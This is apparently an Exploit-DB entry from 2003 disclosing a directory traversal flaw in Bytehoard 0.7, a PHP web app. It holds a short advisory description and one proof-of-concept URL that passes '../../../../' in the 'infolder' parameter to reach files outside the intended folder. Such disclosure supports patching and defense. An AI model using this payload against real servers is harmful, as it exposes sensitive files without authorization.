Bytehoard 0.7 - File Disclosure

EDB-ID:

23261

Author:

Ezhilan

Type:

webapps

Platform:

PHP

Published:

2003-10-20

source: http://www.securityfocus.com/bid/8850/info

Bytehoard is prone to directory traversal attacks. This could potentially permit remote attackers to gain unauthorized access to sensitive files hosted on the system running the software.

http://www.example.com/bytehoard/index.php?infolder=../../../../